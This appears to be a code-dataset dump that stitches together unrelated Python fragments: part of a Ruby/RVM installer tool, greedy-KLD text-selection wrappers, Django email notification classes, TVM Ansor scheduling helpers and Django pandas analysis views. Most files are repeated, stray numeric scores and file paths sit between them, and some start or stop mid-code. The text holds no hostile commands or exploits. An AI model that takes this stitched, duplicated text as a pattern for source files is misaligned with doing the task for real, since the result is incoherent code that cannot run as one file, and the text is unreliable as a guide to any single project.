install.brew(formula)
return
else:
self._systemDeps()
rvm_ruby_ver = 'system'
ruby_bin = pathutil.which('ruby')
executil.callExternal([
env['rvmBin'], 'remove', 'ext-{0}'.format(rvm_ruby_ver)
], suppress_fail=True)
executil.callExternal([
env['rvmBin'], 'mount', ruby_bin, '-n', rvm_ruby_ver
])
def _rubySCLName(self, ver):
pkgver = ver.replace('.', '')
if pkgver == '19':
sclname = 'ruby193'
elif pkgver == '20':
sclname = 'ruby200'
else:
sclname = 'rh-ruby' + pkgver
return sclname
def _fixRvmLinks(self, env, name, ver):
ospath = self._ospath
os = self._os
glob = self._ext.glob
bin_dir = ospath.join(env['rvmDir'], 'rubies', name, 'bin')
for f in ['erb', 'gem', 'irb', 'rake', 'rdoc', 'ri', 'ruby', 'testrb']:
f = ospath.join(bin_dir, f)
res = glob.glob('{0}{1}*'.format(f, ver))
if res:
res = ospath.basename(res[0])
if os.readlink(f) == res:
continue
try:
os.unlink(f)
except Exception as e:
self._warn(str(e))
os.symlink(res, f)
def _updateTool(self, env):
if not env['rubyFoundBinary']:
self._installTool(env)
def uninstallTool(self, env):
ruby_ver = env['rubyVer']
if not env['rubyFoundBinary']:
self._executil.callExternal([
env['rvmBin'], 'uninstall', env['rubyVer']
])
self._have_tool = False
def envNames(self):
return ['rubyVer', 'rubyBin', 'rubyBinOnly', 'rubyForceBuild', 'rubySourceVer', 'rubyEnv']
def initEnv(self, env):
environ = self._environ
ospath = self._ospath
detect = self._detect
path = self._pathutil
# ---
ruby_env = env.get('rubyEnv', '')
if ruby_env:
pass
elif env['type'] == 'dev':
ruby_env = 'development'
else:
ruby_env = 'production'
environ['RUBY_ENV'] = ruby_env
environ['RAILS_ENV'] = ruby_env
# ---
if 'GEM_HOME' in environ:
path.delEnvPath('PATH', environ['GEM_HOME'])
path.delEnvPath('GEM_PATH', environ['GEM_HOME'])
del environ['GEM_HOME']
# ---
rubyForceBuild = env.setdefault('rubyForceBuild', False)
rubyBinOnly = env.setdefault('rubyBinOnly', not rubyForceBuild)
if rubyBinOnly and rubyForceBuild:
self._warn('"rubyBinOnly" and "rubyForceBuild" do not make sense'
' when set together!')
# ---
if detect.isDebian() or detect.isUbuntu():
bb_repo = 'http://ppa.launchpad.net/brightbox/ruby-ng/ubuntu'
ruby_binaries = ['1.9', '2.0', '2.1',
'2.2', '2.3', '2.4', '2.5', '2.6']
code_name = self._detect.osCodeName()
if code_name in []:
# 1.9 build is broken on LaunchPad
bb_repo = 'http://ppa.launchpad.net/brightbox/ruby-ng-experimental/ubuntu'
env.setdefault('rubyBrightboxRepo', bb_repo)
elif detect.isSCLSupported():
if detect.isCentOS():
ruby_binaries = ['1.9', '2.0', '2.2', '2.3', '2.4', '2.5']
else:
ruby_binaries = ['1.9', '2.0', '2.2', '2.3', '2.4', '2.5']
elif detect.isMacOS():
ruby_binaries = ['1.8', '1.9', '2.0',
'2.2', '2.3', '2.4', '2.5', '2.6']
else:
ruby_binaries = None
# ---
if ruby_binaries and not rubyForceBuild:
ruby_ver = env.setdefault('rubyVer', ruby_binaries[-1])
foundBinary = ruby_ver in ruby_binaries
rvm_ruby_ver = ruby_ver
if foundBinary:
rvm_ruby_ver = 'ext-system-{0}'.format(ruby_ver)
# required for LD_LIBRARY_PATH
if detect.isSCLSupported():
sclname = self._rubySCLName(ruby_ver)
try:
env_to_set = self._executil.callExternal(
['scl', 'enable', sclname, 'env'], verbose=False)
self._pathutil.updateEnvFromOutput(env_to_set)
except self._ext.subprocess.CalledProcessError:
pass
except OSError:
pass
elif detect.isMacOS():
env['rubyFoundBinary'] = True
formula = 'ruby@{0}'.format(ruby_ver)
brew_prefix = env['brewDir']
ruby_bin_dir = ospath.join(
brew_prefix, 'opt', formula, 'bin')
if ospath.exists(ruby_bin_dir):
self._pathutil.addBinPath(ruby_bin_dir, True)
super(rubyTool, self).initEnv(env)
self._environ['rubyVer'] = ruby_ver
return
elif detect.isDebian() or detect.isUbuntu():
self._fixRvmLinks(env, rvm_ruby_ver, ruby_ver)
else:
ruby_ver = env.setdefault('rubyVer', self.SYSTEM_VER)
foundBinary = ruby_ver == self.SYSTEM_VER
rvm_ruby_ver = foundBinary and ruby_ver or 'ext-system'
# ---
rvm_dir = env['rvmDir']
env['rubyFoundBinary'] = foundBinary
if rubyForceBuild or not foundBinary:
rvm_ruby_ver = env.setdefault('rubySourceVer', ruby_ver or 'ruby')
try:
env_to_set = self._callBash(env,
'source {0} && \
rvm use {1} >/dev/null && \
env | grep "rvm"'.format(env['rvmInit'], rvm_ruby_ver),
verbose=False
)
except:
return
if env_to_set:
self._pathutil.updateEnvFromOutput(env_to_set)
super(rubyTool, self).initEnv(env)
self._environ['rubyVer'] = ruby_ver
def _buildDeps(self, env):
self._builddep.require(env, 'ssl')
# APT
# ---
self._install.deb([
'build-essential',
'gawk',
'make',
'libc6-dev',
'zlib1g-dev',
'libyaml-dev',
'libsqlite3-dev',
'sqlite3',
'autoconf',
'libgmp-dev',
'libgdbm-dev',
'libncurses5-dev',
'automake',
'libtool',
'bison',
'pkg-config',
'libffi-dev',
'libgmp-dev',
'libreadline-dev',
])
# Extra repo before the rest
# ---
self._install.yumEPEL()
self._install.rpm([
'binutils',
'patch',
'libyaml-devel',
'autoconf',
'gcc',
'gcc-c++',
'glibc-devel',
'readline-devel',
'zlib-devel',
'libffi-devel',
'automake',
'libtool',
'bison',
'sqlite-devel',
'make',
'm4',
'gdbm-devel',
'sqlite3-devel',
])
# ---
self._install.emergeDepsOnly(['dev-lang/ruby'])
self._install.pacman(['ruby'])
self._install.apk('build-base')
def _systemDeps(self):
self._install.debrpm(['ruby'])
self._install.emerge(['dev-lang/ruby'])
self._install.pacman(['ruby'])
self._install.apk(['ruby',
'ruby-bigdecimal',
'ruby-libs',
'ruby-io-console',
'ruby-irb',
'ruby-json',
'ruby-minitest',
'ruby-net-telnet',
'ruby-power_assert',
'ruby-xmlrpc'
])
_GPG_BIRGHTBOX_REPO = '''
-----BEGIN PGP PUBLIC KEY BLOCK-----
Version: SKS 1.1.6
Comment: Hostname: keyserver.ubuntu.com
<KEY>
-----END PGP PUBLIC KEY BLOCK-----
'''
def tuneDefaults(self, env):
return {
'minMemory': '8M',
'socketType': 'none',
'scalable': False,
'reloadable': False,
'multiCore': True,
} | 0.458834 | 0.123339 |
from collections import OrderedDict
from math import inf
from typing import Dict, List, Optional
from typing import OrderedDict as OrderedDictType
from typing import Set
from ordered_set import OrderedSet
from text_selection.greedy_kld_applied import (
greedy_kld_uniform_count, greedy_kld_uniform_default,
greedy_kld_uniform_iterations, greedy_kld_uniform_parts,
greedy_kld_uniform_seconds, greedy_kld_uniform_seconds_with_preselection)
from text_selection.utils import (DurationBoundary, filter_data_durations,
get_filtered_ngrams)
def greedy_kld_uniform_ngrams_parts(data: OrderedDictType[int, List[str]], n_gram: int, ignore_symbols: Optional[Set[str]], parts_count: int, take_per_part: int, n_jobs: int, maxtasksperchild: Optional[int], chunksize: Optional[int]) -> OrderedSet[int]:
data_ngrams = get_filtered_ngrams(data, n_gram, ignore_symbols)
lengths = OrderedDict([(k, len(v)) for k, v in data.items()])
return greedy_kld_uniform_parts(
data=data_ngrams,
take_per_part=take_per_part,
parts_count=parts_count,
lengths=lengths,
n_jobs=n_jobs,
maxtasksperchild=maxtasksperchild,
chunksize=chunksize,
)
def greedy_kld_uniform_ngrams_default(data: OrderedDictType[int, List[str]], n_gram: int, ignore_symbols: Optional[Set[str]], n_jobs: int, maxtasksperchild: Optional[int], chunksize: Optional[int]) -> OrderedSet[int]:
data_ngrams = get_filtered_ngrams(data, n_gram, ignore_symbols)
return greedy_kld_uniform_default(
data=data_ngrams,
n_jobs=n_jobs,
maxtasksperchild=maxtasksperchild,
chunksize=chunksize,
)
def greedy_kld_uniform_ngrams_iterations(data: OrderedDictType[int, List[str]], n_gram: int, ignore_symbols: Optional[Set[str]], iterations: int, n_jobs: int, maxtasksperchild: Optional[int], chunksize: Optional[int]) -> OrderedSet[int]:
data_ngrams = get_filtered_ngrams(data, n_gram, ignore_symbols)
return greedy_kld_uniform_iterations(
data=data_ngrams,
iterations=iterations,
n_jobs=n_jobs,
maxtasksperchild=maxtasksperchild,
chunksize=chunksize,
)
def greedy_kld_uniform_ngrams_seconds(data: OrderedDictType[int, List[str]], n_gram: int, ignore_symbols: Optional[Set[str]], durations_s: Dict[int, float], seconds: float, n_jobs: int, maxtasksperchild: Optional[int], chunksize: Optional[int]) -> OrderedSet[int]:
data_ngrams = get_filtered_ngrams(data, n_gram, ignore_symbols)
return greedy_kld_uniform_seconds(
data=data_ngrams,
durations_s=durations_s,
seconds=seconds,
n_jobs=n_jobs,
maxtasksperchild=maxtasksperchild,
chunksize=chunksize,
)
def greedy_kld_uniform_ngrams_seconds_with_preselection(data: OrderedDictType[int, List[str]], n_gram: int, ignore_symbols: Optional[Set[str]], durations_s: Dict[int, float], seconds: float, preselection: OrderedDictType[int, List[str]], duration_boundary: DurationBoundary, n_jobs: int, maxtasksperchild: Optional[int], chunksize: Optional[int]) -> OrderedSet[int]:
data_ngrams = get_filtered_ngrams(data, n_gram, ignore_symbols)
data_ngrams = filter_data_durations(data_ngrams, durations_s, duration_boundary)
preselection_ngrams = get_filtered_ngrams(preselection, n_gram, ignore_symbols)
return greedy_kld_uniform_seconds_with_preselection(
data=data_ngrams,
durations_s=durations_s,
seconds=seconds,
preselection=preselection_ngrams,
n_jobs=n_jobs,
maxtasksperchild=maxtasksperchild,
chunksize=chunksize,
)
def greedy_kld_uniform_ngrams_count(data: OrderedDictType[int, List[str]], n_gram: int, ignore_symbols: Optional[Set[str]], chars: Dict[int, int], total_count: int, n_jobs: int, maxtasksperchild: Optional[int], chunksize: Optional[int]) -> OrderedSet[int]:
data_ngrams = get_filtered_ngrams(data, n_gram, ignore_symbols)
return greedy_kld_uniform_count(
data=data_ngrams,
chars=chars,
total_count=total_count,
n_jobs=n_jobs,
maxtasksperchild=maxtasksperchild,
chunksize=chunksize,
) | src/text_selection/greedy_kld_export.py | from collections import OrderedDict
from math import inf
from typing import Dict, List, Optional
from typing import OrderedDict as OrderedDictType
from typing import Set
from ordered_set import OrderedSet
from text_selection.greedy_kld_applied import (
greedy_kld_uniform_count, greedy_kld_uniform_default,
greedy_kld_uniform_iterations, greedy_kld_uniform_parts,
greedy_kld_uniform_seconds, greedy_kld_uniform_seconds_with_preselection)
from text_selection.utils import (DurationBoundary, filter_data_durations,
get_filtered_ngrams)
def greedy_kld_uniform_ngrams_parts(data: OrderedDictType[int, List[str]], n_gram: int, ignore_symbols: Optional[Set[str]], parts_count: int, take_per_part: int, n_jobs: int, maxtasksperchild: Optional[int], chunksize: Optional[int]) -> OrderedSet[int]:
data_ngrams = get_filtered_ngrams(data, n_gram, ignore_symbols)
lengths = OrderedDict([(k, len(v)) for k, v in data.items()])
return greedy_kld_uniform_parts(
data=data_ngrams,
take_per_part=take_per_part,
parts_count=parts_count,
lengths=lengths,
n_jobs=n_jobs,
maxtasksperchild=maxtasksperchild,
chunksize=chunksize,
)
def greedy_kld_uniform_ngrams_default(data: OrderedDictType[int, List[str]], n_gram: int, ignore_symbols: Optional[Set[str]], n_jobs: int, maxtasksperchild: Optional[int], chunksize: Optional[int]) -> OrderedSet[int]:
data_ngrams = get_filtered_ngrams(data, n_gram, ignore_symbols)
return greedy_kld_uniform_default(
data=data_ngrams,
n_jobs=n_jobs,
maxtasksperchild=maxtasksperchild,
chunksize=chunksize,
)
def greedy_kld_uniform_ngrams_iterations(data: OrderedDictType[int, List[str]], n_gram: int, ignore_symbols: Optional[Set[str]], iterations: int, n_jobs: int, maxtasksperchild: Optional[int], chunksize: Optional[int]) -> OrderedSet[int]:
data_ngrams = get_filtered_ngrams(data, n_gram, ignore_symbols)
return greedy_kld_uniform_iterations(
data=data_ngrams,
iterations=iterations,
n_jobs=n_jobs,
maxtasksperchild=maxtasksperchild,
chunksize=chunksize,
)
def greedy_kld_uniform_ngrams_seconds(data: OrderedDictType[int, List[str]], n_gram: int, ignore_symbols: Optional[Set[str]], durations_s: Dict[int, float], seconds: float, n_jobs: int, maxtasksperchild: Optional[int], chunksize: Optional[int]) -> OrderedSet[int]:
data_ngrams = get_filtered_ngrams(data, n_gram, ignore_symbols)
return greedy_kld_uniform_seconds(
data=data_ngrams,
durations_s=durations_s,
seconds=seconds,
n_jobs=n_jobs,
maxtasksperchild=maxtasksperchild,
chunksize=chunksize,
)
def greedy_kld_uniform_ngrams_seconds_with_preselection(data: OrderedDictType[int, List[str]], n_gram: int, ignore_symbols: Optional[Set[str]], durations_s: Dict[int, float], seconds: float, preselection: OrderedDictType[int, List[str]], duration_boundary: DurationBoundary, n_jobs: int, maxtasksperchild: Optional[int], chunksize: Optional[int]) -> OrderedSet[int]:
data_ngrams = get_filtered_ngrams(data, n_gram, ignore_symbols)
data_ngrams = filter_data_durations(data_ngrams, durations_s, duration_boundary)
preselection_ngrams = get_filtered_ngrams(preselection, n_gram, ignore_symbols)
return greedy_kld_uniform_seconds_with_preselection(
data=data_ngrams,
durations_s=durations_s,
seconds=seconds,
preselection=preselection_ngrams,
n_jobs=n_jobs,
maxtasksperchild=maxtasksperchild,
chunksize=chunksize,
)
def greedy_kld_uniform_ngrams_count(data: OrderedDictType[int, List[str]], n_gram: int, ignore_symbols: Optional[Set[str]], chars: Dict[int, int], total_count: int, n_jobs: int, maxtasksperchild: Optional[int], chunksize: Optional[int]) -> OrderedSet[int]:
data_ngrams = get_filtered_ngrams(data, n_gram, ignore_symbols)
return greedy_kld_uniform_count(
data=data_ngrams,
chars=chars,
total_count=total_count,
n_jobs=n_jobs,
maxtasksperchild=maxtasksperchild,
chunksize=chunksize,
) | 0.899022 | 0.313302 |
import abc
from collections import namedtuple
from django.conf import settings
from django.template.loader import render_to_string
from django.utils.encoding import force_bytes
from django.utils.http import urlsafe_base64_encode
import core.tasks
from notifications import constants, helpers, models, tokens
Recipient = namedtuple('Recipient', ['email', 'name'])
class NotificationBase(abc.ABC):
category = abc.abstractproperty()
from_email = abc.abstractproperty()
html_template = abc.abstractproperty()
recipient = abc.abstractproperty()
subject = abc.abstractproperty()
text_template = abc.abstractproperty()
unsubscribe_url = abc.abstractproperty()
zendesk_url = settings.ZENDESK_URL
def get_context_data(self, **kwargs):
return {
'full_name': self.recipient.name,
'zendesk_url': self.zendesk_url,
'unsubscribe_url': self.unsubscribe_url,
**kwargs,
}
def get_bodies(self):
context = self.get_context_data()
text_body = render_to_string(self.text_template, context)
html_body = render_to_string(self.html_template, context)
return text_body, html_body
def send(self):
raise NotImplementedError
class SupplierNotificationBase(NotificationBase):
from_email = settings.FAB_FROM_EMAIL
def __init__(self, company_user):
self.company_user = company_user
@property
def recipient(self):
return Recipient(name=self.company_user.name, email=self.company_user.company_email)
def send(self):
text_body, html_body = self.get_bodies()
models.SupplierEmailNotification.objects.create(company_user=self.company_user, category=self.category)
core.tasks.send_email.delay(
subject=self.subject,
text_body=text_body,
html_body=html_body,
recipient_email=self.recipient.email,
from_email=self.from_email,
)
class AnonymousSubscriberNotificationBase(NotificationBase):
from_email = settings.FAS_FROM_EMAIL
def __init__(self, subscriber):
self.subscriber = subscriber
self.notification = models.AnonymousEmailNotification.objects.create(
email=self.recipient.email, category=self.category
)
@property
def recipient(self):
return Recipient(name=self.subscriber['name'], email=self.subscriber['email'])
def send(self):
text_body, html_body = self.get_bodies()
core.tasks.send_email.delay(
subject=self.subject,
text_body=text_body,
html_body=html_body,
recipient_email=self.recipient.email,
from_email=self.from_email,
)
class VerificationWaitingNotification(SupplierNotificationBase):
html_template = 'verification_code_not_given_email.html'
category = constants.VERIFICATION_CODE_NOT_GIVEN
subject = settings.VERIFICATION_CODE_NOT_GIVEN_SUBJECT
text_template = 'verification_code_not_given_email.txt'
unsubscribe_url = settings.FAB_NOTIFICATIONS_UNSUBSCRIBE_URL
def get_context_data(self):
return super().get_context_data(verification_url=settings.VERIFICATION_CODE_URL)
class VerificationStillWaitingNotification(SupplierNotificationBase):
html_template = 'verification_code_not_given_2nd_email.html'
category = constants.VERIFICATION_CODE_2ND_EMAIL
subject = settings.VERIFICATION_CODE_NOT_GIVEN_SUBJECT_2ND_EMAIL
text_template = 'verification_code_not_given_2nd_email.txt'
unsubscribe_url = settings.FAB_NOTIFICATIONS_UNSUBSCRIBE_URL
def get_context_data(self):
return super().get_context_data(
verification_url=settings.VERIFICATION_CODE_URL,
)
class NewCompaniesInSectorNotification(AnonymousSubscriberNotificationBase):
html_template = 'new_companies_in_sector_email.html'
category = constants.NEW_COMPANIES_IN_SECTOR
subject = settings.NEW_COMPANIES_IN_SECTOR_SUBJECT
text_template = 'new_companies_in_sector_email.txt'
def __init__(self, subscriber, companies):
self.companies = companies
super().__init__(subscriber=subscriber)
@property
def unsubscribe_url(self):
uidb64 = urlsafe_base64_encode(force_bytes(self.notification.pk))
token = tokens.anonymous_unsubscribe_token.make_token(self.notification)
return helpers.get_anonymous_unsubscribe_url(uidb64, token)
def get_context_data(self):
return super().get_context_data(
company_list_url=settings.FAS_COMPANY_LIST_URL,
utm_params=settings.NEW_COMPANIES_IN_SECTOR_UTM,
companies=list(self.companies)[:5], # show only 5: ED-1228
)
class SupplierUbsubscribed(SupplierNotificationBase):
html_template = 'unsubscribed-supplier.html'
category = constants.UNSUBSCRIBED
subject = settings.UNSUBSCRIBED_SUBJECT
text_template = 'unsubscribed-supplier.txt'
unsubscribe_url = None
class AnonymousSubscriberUbsubscribed(AnonymousSubscriberNotificationBase):
html_template = 'unsubscribed-anonymous-subscriber.html'
category = constants.UNSUBSCRIBED
subject = settings.UNSUBSCRIBED_SUBJECT
text_template = 'unsubscribed-anonymous-subscriber.txt'
unsubscribe_url = None | notifications/email.py | import abc
from collections import namedtuple
from django.conf import settings
from django.template.loader import render_to_string
from django.utils.encoding import force_bytes
from django.utils.http import urlsafe_base64_encode
import core.tasks
from notifications import constants, helpers, models, tokens
Recipient = namedtuple('Recipient', ['email', 'name'])
class NotificationBase(abc.ABC):
category = abc.abstractproperty()
from_email = abc.abstractproperty()
html_template = abc.abstractproperty()
recipient = abc.abstractproperty()
subject = abc.abstractproperty()
text_template = abc.abstractproperty()
unsubscribe_url = abc.abstractproperty()
zendesk_url = settings.ZENDESK_URL
def get_context_data(self, **kwargs):
return {
'full_name': self.recipient.name,
'zendesk_url': self.zendesk_url,
'unsubscribe_url': self.unsubscribe_url,
**kwargs,
}
def get_bodies(self):
context = self.get_context_data()
text_body = render_to_string(self.text_template, context)
html_body = render_to_string(self.html_template, context)
return text_body, html_body
def send(self):
raise NotImplementedError
class SupplierNotificationBase(NotificationBase):
from_email = settings.FAB_FROM_EMAIL
def __init__(self, company_user):
self.company_user = company_user
@property
def recipient(self):
return Recipient(name=self.company_user.name, email=self.company_user.company_email)
def send(self):
text_body, html_body = self.get_bodies()
models.SupplierEmailNotification.objects.create(company_user=self.company_user, category=self.category)
core.tasks.send_email.delay(
subject=self.subject,
text_body=text_body,
html_body=html_body,
recipient_email=self.recipient.email,
from_email=self.from_email,
)
class AnonymousSubscriberNotificationBase(NotificationBase):
from_email = settings.FAS_FROM_EMAIL
def __init__(self, subscriber):
self.subscriber = subscriber
self.notification = models.AnonymousEmailNotification.objects.create(
email=self.recipient.email, category=self.category
)
@property
def recipient(self):
return Recipient(name=self.subscriber['name'], email=self.subscriber['email'])
def send(self):
text_body, html_body = self.get_bodies()
core.tasks.send_email.delay(
subject=self.subject,
text_body=text_body,
html_body=html_body,
recipient_email=self.recipient.email,
from_email=self.from_email,
)
class VerificationWaitingNotification(SupplierNotificationBase):
html_template = 'verification_code_not_given_email.html'
category = constants.VERIFICATION_CODE_NOT_GIVEN
subject = settings.VERIFICATION_CODE_NOT_GIVEN_SUBJECT
text_template = 'verification_code_not_given_email.txt'
unsubscribe_url = settings.FAB_NOTIFICATIONS_UNSUBSCRIBE_URL
def get_context_data(self):
return super().get_context_data(verification_url=settings.VERIFICATION_CODE_URL)
class VerificationStillWaitingNotification(SupplierNotificationBase):
html_template = 'verification_code_not_given_2nd_email.html'
category = constants.VERIFICATION_CODE_2ND_EMAIL
subject = settings.VERIFICATION_CODE_NOT_GIVEN_SUBJECT_2ND_EMAIL
text_template = 'verification_code_not_given_2nd_email.txt'
unsubscribe_url = settings.FAB_NOTIFICATIONS_UNSUBSCRIBE_URL
def get_context_data(self):
return super().get_context_data(
verification_url=settings.VERIFICATION_CODE_URL,
)
class NewCompaniesInSectorNotification(AnonymousSubscriberNotificationBase):
html_template = 'new_companies_in_sector_email.html'
category = constants.NEW_COMPANIES_IN_SECTOR
subject = settings.NEW_COMPANIES_IN_SECTOR_SUBJECT
text_template = 'new_companies_in_sector_email.txt'
def __init__(self, subscriber, companies):
self.companies = companies
super().__init__(subscriber=subscriber)
@property
def unsubscribe_url(self):
uidb64 = urlsafe_base64_encode(force_bytes(self.notification.pk))
token = tokens.anonymous_unsubscribe_token.make_token(self.notification)
return helpers.get_anonymous_unsubscribe_url(uidb64, token)
def get_context_data(self):
return super().get_context_data(
company_list_url=settings.FAS_COMPANY_LIST_URL,
utm_params=settings.NEW_COMPANIES_IN_SECTOR_UTM,
companies=list(self.companies)[:5], # show only 5: ED-1228
)
class SupplierUbsubscribed(SupplierNotificationBase):
html_template = 'unsubscribed-supplier.html'
category = constants.UNSUBSCRIBED
subject = settings.UNSUBSCRIBED_SUBJECT
text_template = 'unsubscribed-supplier.txt'
unsubscribe_url = None
class AnonymousSubscriberUbsubscribed(AnonymousSubscriberNotificationBase):
html_template = 'unsubscribed-anonymous-subscriber.html'
category = constants.UNSUBSCRIBED
subject = settings.UNSUBSCRIBED_SUBJECT
text_template = 'unsubscribed-anonymous-subscriber.txt'
unsubscribe_url = None | 0.565899 | 0.077343 |
import tvm
from functools import reduce
from tvm import auto_scheduler
from tvm.auto_scheduler.cost_model import RandomModel, XGBModel
from tvm.auto_scheduler.search_policy import SketchPolicy
def establish_task_ansor(
schedule_gen, schedule_app,
measure_opt, task_name):
target_dag = schedule_app.target_dag
inputs = target_dag.get_inputs()
args = inputs + list(target_dag.tensors)
def task_func():
return args
registered_func = auto_scheduler.register_workload(
task_name, f=task_func)
target = tvm.target.Target(measure_opt.target)
task = auto_scheduler.create_task(
task_name, (), target, hw_abs_dag=schedule_gen.hw_abs_dag_stage)
return task
def find_optimized_params_ansor(task, measure_opt, trials, model="random"):
task_name = task.workload_key
log_name = task_name + ".log"
measure_ctx = auto_scheduler.LocalRPCMeasureContext(
priority=measure_opt.priority,
timeout=measure_opt.timeout,
number=measure_opt.number,
repeat=measure_opt.repeat,
min_repeat_ms=measure_opt.min_repeat_ms,
cooldown_interval=measure_opt.cooldown_interval,
enable_cpu_cache_flush=measure_opt.enable_cpu_cache_flush)
tune_option = auto_scheduler.TuningOptions(
num_measure_trials=trials,
runner=measure_ctx.runner,
measure_callbacks=[auto_scheduler.RecordToFile(log_name)],
)
if model == "random":
cost_model = RandomModel()
elif model == "xgb":
cost_model = XGBModel()
else:
raise RuntimeError("Unsupported model: %s" % model)
search_policy = SketchPolicy(task, cost_model)
sch, args = auto_scheduler.auto_schedule(
task, search_policy=search_policy, tuning_options=tune_option)
return log_name
def get_schedule_ansor(task, log_name):
inp, res = auto_scheduler.load_best(log_name, task.workload_key)
sch, args = task.compute_dag.apply_steps_from_state(inp.state)
return sch, args | python/tvm/auto_tensorize/search/ansor_integrate.py | import tvm
from functools import reduce
from tvm import auto_scheduler
from tvm.auto_scheduler.cost_model import RandomModel, XGBModel
from tvm.auto_scheduler.search_policy import SketchPolicy
def establish_task_ansor(
schedule_gen, schedule_app,
measure_opt, task_name):
target_dag = schedule_app.target_dag
inputs = target_dag.get_inputs()
args = inputs + list(target_dag.tensors)
def task_func():
return args
registered_func = auto_scheduler.register_workload(
task_name, f=task_func)
target = tvm.target.Target(measure_opt.target)
task = auto_scheduler.create_task(
task_name, (), target, hw_abs_dag=schedule_gen.hw_abs_dag_stage)
return task
def find_optimized_params_ansor(task, measure_opt, trials, model="random"):
task_name = task.workload_key
log_name = task_name + ".log"
measure_ctx = auto_scheduler.LocalRPCMeasureContext(
priority=measure_opt.priority,
timeout=measure_opt.timeout,
number=measure_opt.number,
repeat=measure_opt.repeat,
min_repeat_ms=measure_opt.min_repeat_ms,
cooldown_interval=measure_opt.cooldown_interval,
enable_cpu_cache_flush=measure_opt.enable_cpu_cache_flush)
tune_option = auto_scheduler.TuningOptions(
num_measure_trials=trials,
runner=measure_ctx.runner,
measure_callbacks=[auto_scheduler.RecordToFile(log_name)],
)
if model == "random":
cost_model = RandomModel()
elif model == "xgb":
cost_model = XGBModel()
else:
raise RuntimeError("Unsupported model: %s" % model)
search_policy = SketchPolicy(task, cost_model)
sch, args = auto_scheduler.auto_schedule(
task, search_policy=search_policy, tuning_options=tune_option)
return log_name
def get_schedule_ansor(task, log_name):
inp, res = auto_scheduler.load_best(log_name, task.workload_key)
sch, args = task.compute_dag.apply_steps_from_state(inp.state)
return sch, args | 0.442637 | 0.153676 |
from django.http import JsonResponse
from collections import Counter
import pandas as pd
import json
from datetime import date, timedelta
from django.contrib.auth.decorators import login_required
from django.utils.decorators import method_decorator
from django.urls import reverse
from django.db.models import Avg, Sum, Count
from django.shortcuts import render
from django.views.generic import TemplateView
from relations.models import *
from entities.models import *
def make_href(row, entity='work', id='id', label=None):
url = reverse(
'entities:generic_entities_detail_view',
kwargs={'pk': row[id], 'entity': entity}
)
if label:
element = """<a href="{}" target='_blank'>{}</a>""".format(url, row[label])
else:
element = """<a href="{}" target='_blank'>{}</a>""".format(url, 'link2object')
return element
def calculate_duration(row):
if row['end_date'] and row['start_date']:
time = pd.to_timedelta(
(row['end_date']-row['start_date']) + timedelta(days=1)
).__str__()
else:
time = pd.to_timedelta("0 days").__str__()
return time
def get_datatables_data_orig(request):
"""returns basically the original excel sheet data"""
pd.set_option('display.max_colwidth', -1)
works = Work.objects.exclude(kind__name__startswith='Verfach')
rows = list(works.values('id', 'excel_row'))
lines = [[{'id': x['id']}, json.loads(x['excel_row'])] for x in rows]
lines = [dict(x[1], **x[0]) for x in lines]
df = pd.DataFrame(lines)
df['Signatur'] = df.apply(
lambda row: make_href(
row, entity='work',
id='id',
label='Signatur'
), axis=1
)
payload = {}
payload['data'] = df.values.tolist()
payload['columns'] = list(df)
return JsonResponse(payload)
def get_datatables_data(request):
pd.set_option('display.max_colwidth', -1)
# PersonWorkRelation
queryset = list(
PersonWork.objects.values(
'id',
'relation_type__name',
'related_work__name',
'related_work',
'related_person__name',
'related_person',
'start_date',
'end_date',
)
)
df = pd.DataFrame(queryset)
df['related_work__name'] = df.apply(
lambda row: make_href(
row, entity='work',
id='related_work',
label='related_work__name'
), axis=1
)
df['related_person__name'] = df.apply(
lambda row: make_href(
row, entity='person',
id='related_person',
label='related_person__name'
), axis=1
)
df['involved_pers'] = df.groupby('related_work__name')['related_work__name']\
.transform('count')
df['grouped_by_pers'] = df.groupby('involved_pers')['involved_pers'].transform('count')
df['grouped_by_pers'] = (df['grouped_by_pers'] / df['involved_pers'])
df['involved_works'] = df.groupby('related_person')['related_person']\
.transform('count')
df['grouped_by_works'] = df.groupby('involved_works')['involved_works'].transform('count')
df['grouped_by_works'] = (df['grouped_by_works'] / df['involved_works'])
df['duration'] = df.apply(lambda row: calculate_duration(row), axis=1)
df['duration'] = df.apply(lambda row: calculate_duration(row), axis=1)
payload = {}
df = df.drop(columns=['id', 'related_work', 'related_person'])
payload['data'] = df.values.tolist()
payload['columns'] = list(df)
return JsonResponse(payload)
@method_decorator(login_required, name='dispatch')
class WorkAnalyze(TemplateView):
template_name = "analyze/basic.html" | analyze/views.py | from django.http import JsonResponse
from collections import Counter
import pandas as pd
import json
from datetime import date, timedelta
from django.contrib.auth.decorators import login_required
from django.utils.decorators import method_decorator
from django.urls import reverse
from django.db.models import Avg, Sum, Count
from django.shortcuts import render
from django.views.generic import TemplateView
from relations.models import *
from entities.models import *
def make_href(row, entity='work', id='id', label=None):
url = reverse(
'entities:generic_entities_detail_view',
kwargs={'pk': row[id], 'entity': entity}
)
if label:
element = """<a href="{}" target='_blank'>{}</a>""".format(url, row[label])
else:
element = """<a href="{}" target='_blank'>{}</a>""".format(url, 'link2object')
return element
def calculate_duration(row):
if row['end_date'] and row['start_date']:
time = pd.to_timedelta(
(row['end_date']-row['start_date']) + timedelta(days=1)
).__str__()
else:
time = pd.to_timedelta("0 days").__str__()
return time
def get_datatables_data_orig(request):
"""returns basically the original excel sheet data"""
pd.set_option('display.max_colwidth', -1)
works = Work.objects.exclude(kind__name__startswith='Verfach')
rows = list(works.values('id', 'excel_row'))
lines = [[{'id': x['id']}, json.loads(x['excel_row'])] for x in rows]
lines = [dict(x[1], **x[0]) for x in lines]
df = pd.DataFrame(lines)
df['Signatur'] = df.apply(
lambda row: make_href(
row, entity='work',
id='id',
label='Signatur'
), axis=1
)
payload = {}
payload['data'] = df.values.tolist()
payload['columns'] = list(df)
return JsonResponse(payload)
def get_datatables_data(request):
pd.set_option('display.max_colwidth', -1)
# PersonWorkRelation
queryset = list(
PersonWork.objects.values(
'id',
'relation_type__name',
'related_work__name',
'related_work',
'related_person__name',
'related_person',
'start_date',
'end_date',
)
)
df = pd.DataFrame(queryset)
df['related_work__name'] = df.apply(
lambda row: make_href(
row, entity='work',
id='related_work',
label='related_work__name'
), axis=1
)
df['related_person__name'] = df.apply(
lambda row: make_href(
row, entity='person',
id='related_person',
label='related_person__name'
), axis=1
)
df['involved_pers'] = df.groupby('related_work__name')['related_work__name']\
.transform('count')
df['grouped_by_pers'] = df.groupby('involved_pers')['involved_pers'].transform('count')
df['grouped_by_pers'] = (df['grouped_by_pers'] / df['involved_pers'])
